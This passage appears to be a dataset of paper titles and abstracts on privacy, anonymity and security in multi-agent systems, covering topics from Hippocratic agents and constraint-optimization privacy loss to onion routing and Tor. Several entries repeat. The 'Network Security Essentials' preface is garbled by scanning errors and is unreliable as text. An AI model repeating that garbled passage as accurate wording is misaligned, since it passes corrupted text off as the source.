the implementation of the notice and choice principles of fair information practices (FIPs), while the privacy-by-architecture approach minimizes the collection of identifiable personal data and emphasizes anonymization and client-side data storage and processing. We discuss both approaches with a view to their technical overlaps and boundaries as well as to economic feasibility. The paper aims to introduce engineers and computer scientists to the privacy research domain and provide concrete guidance on how to design privacy-friendly systems. --- paper_title: An agent‐based privacy‐enhancing model paper_content: Purpose – The purpose of this paper is to discuss a privacy‐enhancing model, which is designed to help web users protect their private information. The model employs a collection of software agents. Privacy‐related decisions are made based on Platform for Privacy Preferences Project (P3P) information collected by the agents.Design/methodology/approach – Based on P3P information collected and user preferences, the software agents play a role in the decision‐making process. This paper presents the design of the agent‐based privacy‐enhancing model and considers the benefits and utility of such an approach.Findings – It is argued that the approach is feasible and it provides an effective solution to the usability limitations associated with P3P.Research limitations/implications – The paper focuses primarily on usability issues related to P3P. Consequently, some of the ancillary security‐related issues that arise are not covered in detail. Also the paper does not cover the development of an appropriate ontolog... --- paper_title: Sensitive Data Transaction in Hippocratic Multi-Agent Systems paper_content: The current evolution of Information Technology leads to the increase of automatic data processing over multiple information systems. The data we deal with concerns sensitive information about users or groups of users. A typical problem in this context concerns the disclosure of confidential identity data. To tackle this difficulty, we consider in this paper the context of Hippocratic Multi-Agent Systems (HiMAS), a model designed for the privacy management. In this context, we propose a common content language combining meta-policies and application context data on one hand and on the other hand an interaction protocol for the exchange of sensitive data. Based on this proposal, agents providing sensitive data are able to check the compliance of the consumers to the HiMAS principles. The protocol that we propose is validated on a distributed calendar management application. --- paper_title: Privacy-Aware Autonomous Agents for Pervasive Healthcare paper_content: Hospitals are convenient settings for deploying pervasive computing technology, but they also raise important privacy concerns. Hospital work imposes significant demands on staff, including high availability, careful attention to patients, confidentiality, rapid response to emergencies, and constant coordination with colleagues. These demands shape the way hospital workers experience and understand privacy. In addition, healthcare professionals experience a high level of mobility because they must collaborate with colleagues and access information and artifacts distributed throughout the premises. Autonomous agents can help developers design privacy-aware systems that handle the threats raised by pervasive technology --- paper_title: Information Sharing among Autonomous Agents in Referral Networks ⋆ paper_content: Referral networks are a kind of P2P system consisting of autonomous agents who seek and provide services, or refer other service providers. Key applications include service discovery and selection, and knowledge sharing. An agent seeking a service contacts other agents to discover suitable service providers. An agent who is contacted may autonomously ignore the request or respond by providing the desired service or giving a referral. This use of referrals is inspired by human interactions, where referrals are a key basis for judging the trustworthiness of a given service. The use of referrals differentiates such networks from traditional P2P information sharing systems, which are based on request flooding. Not only does the use of referrals enable an agent to control how its request is processed, it also provides an architectural basis for four kinds of interaction policies. InterPol is a language and framework supporting such policies. ::: ::: InterPol provides an ability to specify requests with hard and soft constraints as well as a vocabulary of application-independent terms based on interaction concepts. Using these, InterPol enables agents to reveal private information and accept others' information based on subtle relationships. In this manner, InterPol goes beyond traditional referral and other P2P systems in supporting practical applications. InterPol has been implemented using a Datalog-based policy engine for each agent. It has been applied on scenarios from a (multinational) health care project. The contribution of this paper is in a general referrals-based architecture for information sharing among autonomous agents, which is shown to effectively capture a variety of privacy and trust requirements of autonomous users. --- paper_title: HIPPOCRATIC MULTI-AGENT SYSTEMS paper_content: The current evolution of Information Technology leads to the increase of automatic data processing over multiple information systems. In this context, the lack of user’s control on their personal data leads to the crucial question of their privacy preservation. A typical example concerns the disclosure of confidential identity information, without the owner’s agreement. This problem is stressed in multi-agent systems (MAS) where users delegate their control on their personal data to autonomous agents. Interaction being one of the main mechanism in MAS, sensitive information exchange and processing are a key issue with respect to privacy. In this article, we propose a model, ”Hippocratic Multi-Agent System” (HiMAS), to tackle this problem. This model defines a set of principles bearing on an agency to preserve privacy. In order to illustrate our model, we have chosen the concrete application of decentralized calendars management. --- paper_title: A Utility-Theoretic Approach to Privacy and Personalization paper_content: Online services such as web search, news portals, and e-commerce applications face the challenge of providing high-quality experiences to a large, heterogeneous user base. Recent efforts have highlighted the potential to improve performance by personalizing services based on special knowledge about users. For example, a user's location, demographics, and search and browsing history may be useful in enhancing the results offered in response to web search queries. However, reasonable concerns about privacy by both users, providers, and government agencies acting on behalf of citizens, may limit access to such information. We introduce and explore an economics of privacy in personalization, where people can opt to share personal information in return for enhancements in the quality of an online service. We focus on the example of web search and formulate realistic objective functions for search efficacy and privacy. We demonstrate how we can identify a near-optimal solution to the utility-privacy tradeoff. We evaluate the methodology on data drawn from a log of the search activity of volunteer participants. We separately assess users' preferences about privacy and utility via a large-scale survey, aimed at eliciting preferences about peoples' willingness to trade the sharing of personal data in returns for gains in search efficiency. We show that a significant level of personalization can be achieved using only a small amount of information about users. --- paper_title: Trading privacy for trust paper_content: Both privacy and trust relate to knowledge about an entity. However, there is an inherent conflict between trust and privacy: the more knowledge a first entity knows about a second entity, the more accurate should be the trustworthiness assessment; the more knowledge is known about this second entity, the less privacy is left to this entity. This conflict needs to be addressed because both trust and privacy are essential elements for a smart working world. The solution should allow the benefit of adjunct trust when entities interact without too much privacy loss. We propose to achieve the right trade-off between trust and privacy by ensuring minimal trade of privacy for the required trust. We demonstrate how transactions made under different pseudonyms can be linked and careful disclosure of such links fulfils this right trade-off. --- paper_title: Self-disclosure decision making based on intimacy and privacy paper_content: Autonomous agents may encapsulate their principals' personal data attributes. These attributes may be disclosed to other agents during agent interactions, producing a loss of privacy. Thus, agents need self-disclosure decision-making mechanisms to autonomously decide whether disclosing personal data attributes to other agents is acceptable or not. Current self-disclosure decision-making mechanisms consider the direct benefit and the privacy loss of disclosing an attribute. However, there are many situations in which the direct benefit of disclosing an attribute is a priori unknown. This is the case in human relationships, where the disclosure of personal data attributes plays a crucial role in their development. In this paper, we present self-disclosure decision-making mechanisms based on psychological findings regarding how humans disclose personal information in the building of their relationships. We experimentally demonstrate that, in most situations, agents following these decision-making mechanisms lose less privacy than agents that do not use them. --- paper_title: Network Security Essentials: Applications and Standards paper_content: From the Book: ::: PREFACE: Preface In this age of electronic connectivity, of viruses and hackers, of electronic eavesdropping and electronic fraud, network security has assumed increasing importance. Two trends have come together to make the topic of this book of vital interest. First, the explosive growth in computer systems and their interconnections via networks has increased the dependence of both organizations and individuals on the information stored and communicated using these systems. This, in turn, has led to a heightened awareness of the need to protect data and resources from disclosure, to guarantee the authenticity of data and messages, and to protect systems from network-based attacks. Second, the disciplines of cryptography and network security have matured, leading to the development of practical, readily available applications to enforce network security. Objectives It is the purpose of this book to provide a practical survey of network security applications and standards. The emphasis is on applications that are widely used on the Internet and for corporate networks, and on standards, especially Internet standards, that have been widely deployed. Intended Audience The book is intended for both an academic and a professional audience. As a textbook, it is intended as a one-semester undergraduate course on network security for computer science, computer engineering, and electrical engineering majors. The book also serves as a basic reference volume and is suitable for self-study. Plan of the Book The book is organized in three parts: I. Cryptography: A concise survey of the cryptographic algorithms and protocols i reportunderlyingnetwork security applications, including encryption, hash functions, digital signatures, and key exchange. i See Appen~ II. Network Security Applications: Covers important network security tools and applications, including Kerberos, X.509v3 certificates, PGP, S/MIME, IP Secu- rity, SSL/TLS, SET, and SNMPv3. III. System Security: Looks at system-level security issues, including the threat of and countermeasures for intruders and viruses, and the use of firewalls and trusted systems. This book i A more detailed, chapter-by-chapter summary appears at the end of Chapter ~ (CNS2e). 1. In addition, the book includes an extensive glossary, a list of frequently used detailed an< acronyms, and a bibliography. There are also end-of-chapter problems and sugges- of which co tions for further reading. dards (NSE 3. NSE1e in covers SNh Internet Services for Instructors and Students There is a Web page for this book that provides support for students and instruc tors. The page includes links to relevant sites, transparency masters of figures in the book in PDF (Adobe Acrobat) format, and sign-up information for the book's Internet mailing list. The Web page is at ... --- paper_title: Managing business with electronic commerce : issues and trends paper_content: Because the field of electronic commerce has continued to expand so significantly in recent years, it has become necessary for businesses and organizations to address ways to develop successful business application that aid in its effective utilization. This work addresses this important need and is intended for students, practitioners, researchera and also a general audience with an interest in this field. --- paper_title: A performance evaluation of three multiagent platforms paper_content: In the last few years, many researchers have focused on testing the performance of Multiagent Platforms. Results obtained show a lack of performance and scalability on current Multiagent Platforms, but the existing research does not tackle poor efficiency causes. This article is aimed not only at testing the performance of Multiagent Platforms but also the discovery of Multiagent Platform design decisions that can lead to these deficiencies. Therefore, we are able to understand to what extent the internal design of a Multiagent Platform affects its performance. The experiments performed are focused on the features involved in agent communication. --- paper_title: Enforcing security in the AgentScape middleware paper_content: Multi Agent Systems (MAS) provide a useful paradigm for accessing distributed resources in an autonomic and self-directed manner. Resources, such as web services, are increasingly becoming available in large distributed environments. Currently, numerous multi agent systems are available. However, for the multi agent paradigm to become a genuine mainstream success certain key features need to be addressed: the foremost being security. While security has been a focus of the MAS community, configuring and managing such multi agent systems typically remains non-trivial. Well defined and easily configurable security policies address this issue. A security architecture that is both flexible and featureful is prerequisite for a MAS. A novel security policy enforcement system for multi agent middleware systems is introduced. The system facilitates a set of good default configurations but also allows extensive scope for users to develop customised policies to suit their individual needs. An agent middleware, AgentScape, is used to illustrate the system. --- paper_title: A Secure Mobile Agents Platform paper_content: Mobile Agents is a new paradigm for distributed computing where security is very essential to the acceptance of this paradigm in a large scale distributed environment. In this paper, we propose protection mechanisms for mobile agents. In these mechanisms, the authentication of mobile agents and the access control to the system resources are controlled by the mobile-agents platform. Each agent defines its own access control policy with regard to other agents using an Interface Definition Language (IDL), thus enforcing modularity and easing programming task. An evaluation of these mechanisms has been conducted. The measurements give the overhead involved by the proposed protection mechanisms to the performance of mobile agents. An important advantage of our protection mechanisms are transparency to agents and the portability of nonsecure applications onto a secure environment. A mobile agent system and the protection mechanisms have been implemented. Our experiments have shown the feasibility and the advantages of our mechanisms. --- paper_title: ADK: An Agent Development Kit Based on a Formal Design Model for Multi-Agent Systems paper_content: The advent of multi-agent systems has brought us opportunities for the development of complex software that will serve as the infrastructure for advanced distributed applications. During the past decade, there have been many agent architectures proposed for implementing agent-based systems, and also a few efforts to formally specify agent behaviors. However, research on narrowing the gap between agent formal models and agent implementation is rare. In this paper, we propose a model-based approach to designing and implementing intelligent agents for multi-agent systems (MAS). Instead of using formal methods for the purpose of specifying agent behavior, we bring formal methods into the design phase of the agent development life cycle. Specifically, we use the formalism called agent-oriented G-net model, which is based on the G-net formalism (a type of high-level Petri net), to serve as the high-level design for intelligent agents. Based on the high-level design, we further derived the agent architecture and the detailed design for agent implementation. To demonstrate the feasibility of our approach, we developed the toolkit called ADK (Agent Development Kit) that supports rapid development of intelligent agents for multi-agent systems and we discuss the role of inheritance in agent-oriented development. As a potential solution for automated software development, we summarize the procedure to generate a model-based design of application-specific agents. Finally, to illustrate an application built on ADK, we present an air-ticket trading example. --- paper_title: Concepts and architecture of a security-centric mobile agent server paper_content: Mobile software agents are software components that are able to move in a network. They are often considered as an attractive technology in electronic commerce applications. Although security concerns prevail. We describe the architecture and concepts of the SeMoA server-a runtime environment for Java-based mobile agents. Its architecture has a focus on security and easy extendability, and offers a framework for transparent content inspection of agents by means of filters. We implemented filters that handle agent signing and authentication as well as selective encryption of agent contents. Filters are applied transparently such that agents need not be aware of the security services provided by the server. --- paper_title: A group-oriented secure multiagent platform paper_content: Security is becoming a major concern in multiagent systems, since an agent's incorrect or inappropriate behaviour may cause non-desired effects, such as money and data loss. Some multiagent platforms (MAP) are now providing baseline security features, such as authentication, authorization, integrity and confidentiality. However, they fail to support other features related to the sociability skills of agents such as agent groups. What is more, none of the listed MAPs provide a mechanism for preserving the privacy of the users (regarding their identities) that run their agents on such MAPs. In this paper, we present the security infrastructure (SI) of the Magentix MAP, which supports agent groups and preserves user identity privacy. The SI is based on identities that are assigned to all the different entities found in Magentix (users, agents and agent groups). We also provide an evaluation of the SI describing an example application built on top of Magentix and a performance evaluation of it. Copyright © 2010 John Wiley & Sons, Ltd. --- paper_title: Privacy protection in electronic commerce – a theoretical framework paper_content: In this paper, a theoretical framework for privacy protection in electronic commerce is provided. This framework allows us to identify the key players and their interactions in the context of privacy violation and protection. It also helps to discover the responsibilities of the key players and areas for further research. --- paper_title: The Froehlich/Kent encyclopedia of telecommunications paper_content: "Wireless Multiple Access Adaptive Communications Technique, Gregory J. Pottie Wireless Networking, Asuncion Satamaria and F. J. Lopez-Hernandez Wireless Packet Data Technology, Apostolis K. Salkintzis and Christodoulos Chamzas Wireless Radio Software Architecture, Joseph Mitola Wireless Receivers Using Digitization at the RF or IF, Jeffrey A. Wepman Wireline and Wireless Applications for Intelligent Transportation Systems, Kevin Needham, Matthew McDonald, and Matthew Hardison Workbench for Security Officers, Allison Anderson, Lam For Kwok, and Dennis Longley World Wide Web and Internet Numbering and Naming Systems, Jon Postel and Joyce K. Reynolds The World Wide Web (WWW) and Secure Electronic Commerce, S. H. Von Solms Zworykin, Vladimir Kosma, Joyce E. Bedi Epilogue---New Communications Services---What Does Society Want?, Robert W. Lucky " --- paper_title: An agent-based approach for privacy-preserving recommender systems paper_content: Recommender Systems are used in various domains to generate personalized information based on personal user data. The ability to preserve the privacy of all participants is an essential requirement of the underlying Information Filtering architectures, because the deployed Recommender Systems have to be accepted by privacy-aware users as well as information and service providers. Existing approaches neglect to address privacy in this multilateral way. We have developed an approach for privacy-preserving Recommender Systems based on Multiagent System technology which enables applications to generate recommendations via various filtering techniques while preserving the privacy of all participants. We describe the main modules of our solution as well as an application we have implemented based on this approach. --- paper_title: Privacy-preserving demographic filtering paper_content: The use of recommender systems in e-commerce to guide customer choices presents a privacy protection problem that is twofold. We seek to protect the privacy interests of customers by trying to keep private their identity and demographic characteristics, and possibly also their buying preferences and behaviour. This can be desirable even if anonymity is used. Furthermore, we want to protect the commercial interests of the e-commerce service providers by allowing them to make recommendations as accurate as possible, without unnecessarily revealing valuable information they have legitimately accumulated, such as market trends, to third parties.In this paper, we concentrate on recommender systems based on demographic filtering, which make recommendations based on feedback of previous users of similar demographic characteristics (such as age, sex, level of education, wealth, geographical location, etc.). We propose a system called ALAMBIC, which adequately achieves the above privacy-protection objectives in this kind of recommender systems. Our system is based on a semi-trusted third party in which the users need only have limited confidence. A main originality of our approach is to split user data between that party and the service provider in such a way that neither can derive sensitive information from their share alone. --- paper_title: A Taxonomy of Privacy paper_content: Privacy is a concept in disarray. Nobody can articulate what it means. As one commentator has observed, privacy suffers from an embarrassment of meanings. Privacy is far too vague a concept to guide adjudication and lawmaking, as abstract incantations of the importance of privacy do not fare well when pitted against more concretely-stated countervailing interests. In 1960, the famous torts scholar William Prosser attempted to make sense of the landscape of privacy law by identifying four different interests. But Prosser focused only on tort law, and the law of information privacy is significantly more vast and complex, extending to Fourth Amendment law, the constitutional right to information privacy, evidentiary privileges, dozens of federal privacy statutes, and hundreds of state statutes. Moreover, Prosser wrote over 40 years ago, and new technologies have given rise to a panoply of new privacy harms. A new taxonomy to understand privacy violations is thus sorely needed. This article develops a taxonomy to identify privacy problems in a comprehensive and concrete manner. It endeavors to guide the law toward a more coherent understanding of privacy and to serve as a framework for the future development of the field of privacy law. --- paper_title: Engineering Privacy paper_content: In this paper we integrate insights from diverse islands of research on electronic privacy to offer a holistic view of privacy engineering and a systematic structure for the discipline's topics. First we discuss privacy requirements grounded in both historic and contemporary perspectives on privacy. We use a three-layer model of user privacy concerns to relate them to system operations (data transfer, storage and processing) and examine their effects on user behavior. In the second part of the paper we develop guidelines for building privacy-friendly systems. We distinguish two approaches: "privacy-by-policy" and "privacy-by-architecture." The privacy-by-policy approach focuses on the implementation of the notice and choice principles of fair information practices (FIPs), while the privacy-by-architecture approach minimizes the collection of identifiable personal data and emphasizes anonymization and client-side data storage and processing. We discuss both approaches with a view to their technical overlaps and boundaries as well as to economic feasibility. The paper aims to introduce engineers and computer scientists to the privacy research domain and provide concrete guidance on how to design privacy-friendly systems. --- paper_title: Anonymity and software agents: An interdisciplinary challenge paper_content: Software agents that play a role in E-commerce and E-government applications involving the Internet often contain information about the identity of their human user such as credit cards and bank accounts. This paper discusses whether this is necessary: whether human users and software agents are allowed to be anonymous under the relevant legal regimes and whether an adequate interaction and balance between law and anonymity can be realised from both the perspective of Computer Systems and the perspective of Law. --- paper_title: Anonymity Metrics Revisited paper_content: In 2001, two information theoretic anonymity metrics were proposed: the "effective anonymity set size" and the "degree of anonymity". In this talk, we propose an abstract model for a general anonymity system which is consistent with the definition of anonymity on which the metrics are based. We revisit entropy-based anonymity metrics, and we apply them to Crowds, a practical ::: anonymity system. We discuss the differences between the two metrics ::: and the results obtained in the example. --- paper_title: Analysis of Privacy Loss in Distributed Constraint Optimization paper_content: Distributed Constraint Optimization (DCOP) is rapidly emerging as a prominent technique for multi agent coordination. However, despite agent privacy being a key motivation for applying DCOPs in many applications, rigorous quantitative evaluations of privacy loss in DCOP algorithms have been lacking. Recently, [Maheswaran et al. 2005] introduced a framework for quantitative evaluations of privacy in DCOP algorithms, showing that some DCOP algorithms lose more privacy than purely centralized approaches and questioning the motivation for applying DCOPs. This paper addresses the question of whether state-of-the art DCOP algorithms suffer from a similar shortcoming by investigating several of the most efficient DCOP algorithms, including both DPOP and ADOPT. Furthermore, while previous work investigated the impact on efficiency of distributed contraint reasoning design decisions (e.g. constraint-graph topology, asynchrony, message-contents), this paper examines the privacy aspect of such decisions, providing an improved understanding of privacy-efficiency tradeoffs. --- paper_title: Privacy Loss in Distributed Constraint Reasoning: A Quantitative Framework for Analysis and its Applications paper_content: It is critical that agents deployed in real-world settings, such as businesses, offices, universities and research laboratories, protect their individual users' privacy when interacting with other entities. Indeed, privacy is recognized as a key motivating factor in the design of several multiagent algorithms, such as in distributed constraint reasoning (including both algorithms for distributed constraint optimization (DCOP) and distributed constraint satisfaction (DisCSPs)), and researchers have begun to propose metrics for analysis of privacy loss in such multiagent algorithms. Unfortunately, a general quantitative framework to compare these existing metrics for privacy loss or to identify dimensions along which to construct new metrics is currently lacking. This paper presents three key contributions to address this shortcoming. First, the paper presents VPS (Valuations of Possible States), a general quantitative framework to express, analyze and compare existing metrics of privacy loss. Based on a state-space model, VPS is shown to capture various existing measures of privacy created for specific domains of DisCSPs. The utility of VPS is further illustrated through analysis of privacy loss in DCOP algorithms, when such algorithms are used by personal assistant agents to schedule meetings among users. In addition, VPS helps identify dimensions along which to classify and construct new privacy metrics and it also supports their quantitative comparison. Second, the article presents key inference rules that may be used in analysis of privacy loss in DCOP algorithms under different assumptions. Third, detailed experiments based on the VPS-driven analysis lead to the following key results: (i) decentralization by itself does not provide superior protection of privacy in DisCSP/DCOP algorithms when compared with centralization; instead, privacy protection also requires the presence of uncertainty about agents' knowledge of the constraint graph. (ii) one needs to carefully examine the metrics chosen to measure privacy loss; the qualitative properties of privacy loss and hence the conclusions that can be drawn about an algorithm can vary widely based on the metric chosen. This paper should thus serve as a call to arms for further privacy research, particularly within the DisCSP/DCOP arena. --- paper_title: Distributed constraint satisfaction and optimization with privacy enforcement paper_content: Several naturally distributed negotiation/cooperation problems with privacy requirements can be modeled within the distributed constraint satisfaction framework, where the constraints are secrets of the participants. Most of the existing techniques aim at various tradeoffs between complexity and privacy guarantees, while others aim to maximize privacy first, according to Yokoo et al. (2002), Silaghi (2003), Faltings (2003), Liu et al. (2002) and Wallace and Silaghi (2004). In Silaghi (2003) we introduced a first technique allowing agents to solve distributed constraint problems (DisCSPs), without revealing anything and without trusting each other or some server. The technique we propose now is a dm times improvement for m variables of domain size d. On the negative side, the fastest versions of the technique require storing of O(d/sup m/) big integers. From a practical point of view, we improve the privacy with which these problems can be solved, and improve the efficiency with which /spl lfloor/n-1/2/spl rfloor/-privacy can be achieved, while it remains inapplicable for larger problems. The technique of Silaghi (2003) has a simple extension to optimization for distributed weighted CSPs. However, that obvious extension leaks to everybody sensitive information concerning the quality of the computed solution. We found a way to avoid this leak, which constitutes another contribution of This work. --- paper_title: SSDPOP: improving the privacy of DCOP with secret sharing paper_content: multiagent systems designed to work collaboratively with groups of people typically require private information that people will entrust to them only if they have assurance that this information will be protected. Although Distributed Constraint Optimization (DCOP) has emerged as a prominent technique for multiagent coordination, existing algorithms for solving DCOP problems do not adeqately protect agents' privacy. This paper analyzes privacy protection and loss in existing DCOP algorithms. It presents a new algorithm, SSDPOP, which augments a prominent DCOP algorithm (DPOP) with secret sharing techniques. This approach significantly reduces privacy loss, while preserving the structure of the DPOP algorithm and introducing only minimal computational overhead. Results show that SSDPOP reduces privacy loss by 29--88% on average over DPOP. --- paper_title: Secure Distributed Constraint Satisfaction: Reaching Agreement without Revealing Private Information paper_content: This paper develops a secure distributed Constraint Satisfaction algorithm. A Distributed Constraint Satisfaction Problem (DisCSP) is a CSP in which variables and constraints are distributed among multiple agents. A major motivation for solving a DisCSP without gathering all information in one server is the concern about privacy/security. However, existing DisCSP algorithms leak some information during the search process and privacy/security issues are not dealt with formally. Our newly developed algorithm utilizes a public key encryption scheme. In this algorithm, multiple servers, which receive encrypted information from agents, cooperatively perform a search process that is equivalent to a standard chronological backtracking. This algorithm does not leak any private information, i.e., neither agents nor servers can obtain any additional information on the value assignment of variables that belong to other agents. --- paper_title: Onion Routing for Anonymous and Private Internet Connections paper_content: Abstract : Preserving privacy means not only hiding the content of messages, but also hiding who is talking to whom (traffic analysis). Much like a physical envelope, the simple application of cryptography within a packet-switched network hides the messages being sent, but can reveal who is talking to whom, and how often. Onion Routing is a general purpose infrastructure for private communication over a public network [8, 9, 4]. It provides anonymous connections that are strongly resistant to both eavesdropping and traffic analysis. The connections are bidirectional, near real-time, and can be used for both connection-based and connectionless traffic. Onion Routing interfaces with off the shelf software and systems through specialized proxies, making it easy to integrate into existing systems. Prototypes have been running since July 1997. As of this article's publication, the prototype network is processing more than 1 million Web connections per month from more than six thousand IP addresses in twenty countries and in all six main top level domains. [7] --- paper_title: Anonymous Communications for Mobile Agents paper_content: Anonymous communication techniques are vital for some types of e-commerce applications. There have been several different approaches developed for providing anonymous communication over the Internet. In this paper, we review key techniques for anonymous communication and describe an alternate anonymous networking approach based on agile agents intended to provide anonymous communication protection for mobile agent systems. --- paper_title: IntelliShopper: a proactive, personal, private shopping assistant paper_content: The IntelliShopper is a shopping assistant designed to empower consumers. It is a personal assistant in that it observes the users while shopping and learns their preferences with respect to various features that characterize shopping items. It is proactive in that it remembers the users' requests and autonomously monitors vendor sites for new items that might match the users' needs and preferences. Finally, it protects users' privacy by means of pseudonymity, IP anony\-mizing, and trusted filtering. Pseudonymity is achieved through the use of personae; we show that this approach also behooves successful classification. IP anonymizing can be performed in at least two manners, which we discuss and compare in the context of our application. Trusted filtering --- as opposed to merchant-based filtering --- improves privacy by allowing users to select their preferred privacy representative. This paper introduces the IntelliShopper system, discusses its architecture and components, describes a prototype implementation, and outlines preliminary evaluations of its performance. --- paper_title: Untraceable electronic mail, return addresses, and digital pseudonyms paper_content: A technique based on public key cryptography is presented that allows an electronic mail system to hide who a participant communicates with as well as the content of the communication - in spite of an unsecured underlying telecommunication system. The technique does not require a universally trusted authority. One correspondent can remain anonymous to a second, while allowing the second to respond via an untraceable return address. The technique can also be used to form rosters of untraceable digital pseudonyms from selected applications. Applicants retain the exclusive ability to form digital signatures corresponding to their pseudonyms. Elections in which any interested party can verify that the ballots have been properly counted are possible if anonymously mailed ballots are signed with pseudonyms from a roster of registered voters. Another use allows an individual to correspond with a record-keeping organization under a unique pseudonym, which appears in a roster of acceptable clients. --- paper_title: Tor: The Second-Generation Onion Router paper_content: We present Tor, a circuit-based low-latency anonymous communication service. This second-generation Onion Routing system addresses limitations in the original design by adding perfect forward secrecy, congestion control, directory servers, integrity checking, configurable exit policies, and a practical design for location-hidden services via rendezvous points. Tor works on the real-world Internet, requires no special privileges or kernel modifications, requires little synchronization or coordination between nodes, and provides a reasonable tradeoff between anonymity, usability, and efficiency. We briefly describe our experiences with an international network of more than 30 nodes. We close with a list of open problems in anonymous communication. --- paper_title: Design and Implementation of a Secure Multi-Agent Marketplace paper_content: A multi-agent marketplace, MAGNET (Multi AGent Negotiation Testbed), is a promising solution for conducting online combinatorial auctions. The trust model of MAGNET is somewhat dieren t from other on-line auction systems, since the marketplace, which mediates all communications between agents, acts as a partiallytrusted third party. In this paper, we identify the security vulnerabilities of MAGNET and present a solution that overcomes these weaknesses. Our solution makes use of three dieren t existing technologies with standard cryptographic techniques: a publish/subscribe system to provide simple and general messaging, time-release cryptography to provide guaranteed nondisclosure of the bids, and anonymous communication to hide the identity of the bidders until the end of the auction. By doing so, we successfully minimize the trust on the market as well as increase the security of the whole system. The protocol that we have developed can be adapted for use by other agent-based auction systems, which use a third party to mediate transactions. --- paper_title: Security without identification: transaction systems to make big brother obsolete paper_content: The large-scale automated transaction systems of the near future can be designed to protect the privacy and maintain the security of both individuals and organizations. --- paper_title: User centricity: a taxonomy and open issues paper_content: User centricity is a significant concept in federated identity management (FIM), as it provides for stronger user control and privacy. However, several notions of user-centricity in the FIM community render its semantics unclear and hamper future research in this area. Therefore, we consider user-centricity abstractly and establish a comprehensive taxonomy encompassing user-control, architecture, and usability aspects of user-centric FIM. On the systems layer, we discuss user-centric FIM systems and classify them into two predominant variants with significant feature sets. We distinguish credential-focused systems, which advocate offline identity providers and long-term credentials at a user's client, and relationship-focused systems, which rely on the relationships between users and online identity providers that create short-term credentials during transactions. Note that these two notions of credentials are quite different. The further one encompasses cryptographic credentials as defined by Lysyanskaya et al. [30], the latter one federation tokens as used in today's FIM protocols like Liberty.We raise the question where user-centric FIM systems may go--within the limitations of the user-centricity paradigm as well as beyond them. Firstly, we investigate the existence of a universal user-centric FIM system that can achieve a superset of security and privacy properties as well as the characteristic features of both pre-dominant classes. Secondly, we explore the feasibility of reaching beyond user-centricity, that is, allowing a user of a user-centric FIM system to again give away user-control by means of an explicit act of delegation. We do neither claim a solution for universal user-centric systems nor for the extension beyond the boundaries ventures by leveraging the properties of a credential-focused FIM system. --- paper_title: IntelliShopper: a proactive, personal, private shopping assistant paper_content: The IntelliShopper is a shopping assistant designed to empower consumers. It is a personal assistant in that it observes the users while shopping and learns their preferences with respect to various features that characterize shopping items. It is proactive in that it remembers the users' requests and autonomously monitors vendor sites for new items that might match the users' needs and preferences. Finally, it protects users' privacy by means of pseudonymity, IP anony\-mizing, and trusted filtering. Pseudonymity is achieved through the use of personae; we show that this approach also behooves successful classification. IP anonymizing can be performed in at least two manners, which we discuss and compare in the context of our application. Trusted filtering --- as opposed to merchant-based filtering --- improves privacy by allowing users to select their preferred privacy representative. This paper introduces the IntelliShopper system, discusses its architecture and components, describes a prototype implementation, and outlines preliminary evaluations of its performance. --- paper_title: An agent-based approach for privacy-preserving recommender systems paper_content: Recommender Systems are used in various domains to generate personalized information based on personal user data. The ability to preserve the privacy of all participants is an essential requirement of the underlying Information Filtering architectures, because the deployed Recommender Systems have to be accepted by privacy-aware users as well as information and service providers. Existing approaches neglect to address privacy in this multilateral way. We have developed an approach for privacy-preserving Recommender Systems based on Multiagent System technology which enables applications to generate recommendations via various filtering techniques while preserving the privacy of all participants. We describe the main modules of our solution as well as an application we have implemented based on this approach. --- paper_title: Privacy-preserving demographic filtering paper_content: The use of recommender systems in e-commerce to guide customer choices presents a privacy protection problem that is twofold. We seek to protect the privacy interests of customers by trying to keep private their identity and demographic characteristics, and possibly also their buying preferences and behaviour. This can be desirable even if anonymity is used. Furthermore, we want to protect the commercial interests of the e-commerce service providers by allowing them to make recommendations as accurate as possible, without unnecessarily revealing valuable information they have legitimately accumulated, such as market trends, to third parties.In this paper, we concentrate on recommender systems based on demographic filtering, which make recommendations based on feedback of previous users of similar demographic characteristics (such as age, sex, level of education, wealth, geographical location, etc.). We propose a system called ALAMBIC, which adequately achieves the above privacy-protection objectives in this kind of recommender systems. Our system is based on a semi-trusted third party in which the users need only have limited confidence. A main originality of our approach is to split user data between that party and the service provider in such a way that neither can derive sensitive information from their share alone. --- paper_title: Enforcing security in the AgentScape middleware paper_content: Multi Agent Systems (MAS) provide a useful paradigm for accessing distributed resources in an autonomic and self-directed manner. Resources, such as web services, are increasingly becoming available in large distributed environments. Currently, numerous multi agent systems are available. However, for the multi agent paradigm to become a genuine mainstream success certain key features need to be addressed: the foremost being security. While security has been a focus of the MAS community, configuring and managing such multi agent systems typically remains non-trivial. Well defined and easily configurable security policies address this issue. A security architecture that is both flexible and featureful is prerequisite for a MAS. A novel security policy enforcement system for multi agent middleware systems is introduced. The system facilitates a set of good default configurations but also allows extensive scope for users to develop customised policies to suit their individual needs. An agent middleware, AgentScape, is used to illustrate the system. --- paper_title: Partial identities as a foundation for trust and reputation paper_content: This paper explores the relationships between the hard security concepts of identity and privacy on the one hand, and the soft security concepts of trust and reputation on the other hand. We specifically focus on two vulnerabilities that current trust and reputation systems have: the change of identity and multiple identities problems. As a result, we provide a privacy preserving solution to these vulnerabilities which integrates the explored relationships among identity, privacy, trust and reputation. We also provide a prototype of our solution to these vulnerabilities and an application scenario. --- paper_title: Privacy-enhancing technologies: approaches and development paper_content: In this paper, we discuss privacy threats on the Internet and possible solutions to this problem. Examples of privacy threats in the communication networks are identity disclosure, linking data traffic with identity, location disclosure in connection with data content transfer, user profile disclosure or data disclosure itself. Identifying the threats and the technology that may be used for protection can provide satisfactory protection of privacy over general networks that are building today the information infrastructure. In general, these technologies are known as Privacy-Enhancing Technologies (PETs). This article analyses some of the key privacy-Enhancing Technologies and provides view in the on-going projects developing these technologies. --- paper_title: An agent infrastructure for privacy-enhancing agent-based e-commerce applications paper_content: Privacy is of crucial importance in order for agent-based e-commerce applications to be of broad use. Privacy can be enhanced minimizing data identifiability, i.e., the degree by which personal information can be directly attributed to a particular individual. However, minimizing data identifiability may directly impact other crucial issues in agent-based e-commerce, such as accountability, trust, and reputation. In this paper, we present an agent infrastructure for agent-based e-commerce applications. This agent infrastructure enhances privacy without compromising accountability, trust, and reputation. --- paper_title: A group-oriented secure multiagent platform paper_content: Security is becoming a major concern in multiagent systems, since an agent's incorrect or inappropriate behaviour may cause non-desired effects, such as money and data loss. Some multiagent platforms (MAP) are now providing baseline security features, such as authentication, authorization, integrity and confidentiality. However, they fail to support other features related to 